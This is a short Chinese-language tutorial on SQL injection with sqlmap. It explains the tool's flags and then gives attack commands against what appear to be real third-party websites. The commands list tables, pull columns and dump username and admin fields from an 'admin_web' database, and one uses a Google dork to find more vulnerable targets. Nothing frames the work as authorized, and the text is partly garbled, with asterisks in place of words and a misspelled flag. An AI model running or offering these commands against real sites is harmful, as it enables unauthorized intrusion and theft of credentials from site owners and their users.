SQL(Structured Query Language)結構化查詢語言
SQL注入***是一種比較常見的針對數據庫的漏洞***方式
結構化查詢語句使用來和關係數據庫進行交互的文本語言。它允許用戶對數據進行有效的管理,包含了對數據的查詢、操作、定義和控制等方面
關係數據庫廣泛應用於網站中,用戶一般通過動態網頁和數據庫間接進行交互
安全性考慮不周的網站應用程序(動態網頁)使得***者能夠構造並提交惡意URL,將特殊構造的SQL語句插入到提交的參數中,在和關係數據庫進行交互時獲得私密信息,或者直接篡改Web數據,這就是所謂的SQL注入***
SQL注入參數
-u:指URL(Uniform Resource Locator)統一資源定位符
統一資源定位符是對可以從互聯網上得到的資源的位置和訪問方法的一種簡潔的表示,是互聯網上標準資源的地址。互聯網上的每個文件都有一個唯一的URL,它包含的信息指出文件的位置以及瀏覽器應該怎麼處理它
-D:數據庫
-T:表名
--tables參數:列表名(查看數據庫中的表)
--columns參數:列表字段(查看錶中字段)
--dump參數:下載數據
--is-bda:當前用戶權限
--dbs:所有數據庫
--current-db:網站當前數據庫
--users:所有數據庫用戶
--current-user:當前數據庫用戶
--cookie參數:定義連接調用位置
--level參數:檢測等級
sqlmap官網:www.sqlmap.org
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103”
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103” --tables
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103” --tables -D "admin_web" 查看數據庫
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103”--columns -T "表名" -D "admin_web"
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103”--dump -C "username,admin" -T "表名" -D "admin_web"
sqlmap -u http://www.jsshzx.cn/User_Login.asp?ClassID=321 --cookie"id=9" --level 9
-g:使用google
搜索引擎語法:inurl、intext、intitle、site
sqlmap -g "inurl:php?eid"
